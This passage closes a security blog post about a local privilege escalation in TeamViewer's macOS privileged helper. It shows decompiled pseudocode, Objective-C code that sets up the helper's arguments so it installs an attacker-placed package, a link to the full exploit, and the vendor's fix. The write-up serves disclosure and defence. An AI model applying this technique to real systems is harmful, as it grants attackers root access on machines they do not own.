</span></span><span style="display:flex;"><span>            r14 <span style="color:#555">=</span> <span style="color:#f60">0x1</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">else</span> {
</span></span><span style="display:flex;"><span>            r14 <span style="color:#555">=</span> <span style="color:#f60">0x0</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    [r12 <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    [var_30 <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    [var_38 <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    rax <span style="color:#555">=</span> r14 <span style="color:#555">&amp;</span> <span style="color:#f60">0xff</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">return</span> rax;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This function is slightly more complicated. It again expects a <code>HelperArguments</code> object. It will take its <code>stringArguments</code>  as well as the  <code>bundlePath</code> property. It will append <code>Contents/Resources</code> to the path found in <code>bundlePath</code> and append to that the <code>remotePrintingInstallPkgName</code> taken from the <code>stringArguments</code>. Once it has the full path it will install it via the <code>installer</code> command line.</p>
<p>In this case we need to setup our objects as follows.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f0f3f3;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-objectivec" data-lang="objectivec"><span style="display:flex;"><span>   <span style="color:#09f;font-style:italic">//setup parameters
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>    HelperStringArguments <span style="color:#555">*</span> hsa <span style="color:#555">=</span> [HelperStringArguments new];
</span></span><span style="display:flex;"><span>     
</span></span><span style="display:flex;"><span>     <span style="color:#09f;font-style:italic">//this is the name of the package that will be installed by installRemotePrinting
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>    hsa.remotePrintingInstallPkgName <span style="color:#555">=</span> <span style="color:#c30">@&#34;my_package.pkg&#34;</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#09f;font-style:italic">//we create our object
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>    HelperArguments <span style="color:#555">*</span> helperargs <span style="color:#555">=</span> [[HelperArguments alloc] init];
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#09f;font-style:italic">//installRemotePrinting will use this path to locate the package named above
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>    <span style="color:#09f;font-style:italic">//package will need to be inside /Contents/Resources/
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>    helperargs.bundlePath <span style="color:#555">=</span> <span style="color:#c30">@&#34;/tmp/pkg.app&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#09f;font-style:italic">//we need to embed HelperStringArguments
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>    helperargs.stringArguments <span style="color:#555">=</span> hsa;
</span></span></code></pre></div><p>And we will need to place a package file in <code>/tmp/pkg.app/Contents/Resources/my_package.pkg</code>.</p>
<p>Full exploit code is available here:
<a href="https://gist.github.com/theevilbit/6e49b2e1d1ca1189f4c936cbf170a101">TeamViewer LPE exploit · GitHub</a></p>
<h3 id="fix">Fix</h3>
<p>TeamViewer rewrote their entire privileged helper from scratch, and now they use XPC, use audit tokens to verify clients and also make it in a secure way.</p>

      </div>

      <footer>
        


        
      </footer>
    </article>

    
  </section>

      </div>

      <footer class="footer">
  <section class="container">
    
     © 2023
    
       · 
      Blog created by <a href="https://twitter.com/theevilbit">@theevilbit</a>.
    
    
  </section>
</footer>

    </main>

    
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-151008930-1', 'auto');
	
	ga('send', 'pageview');
}
</script>

  </body>

</html>
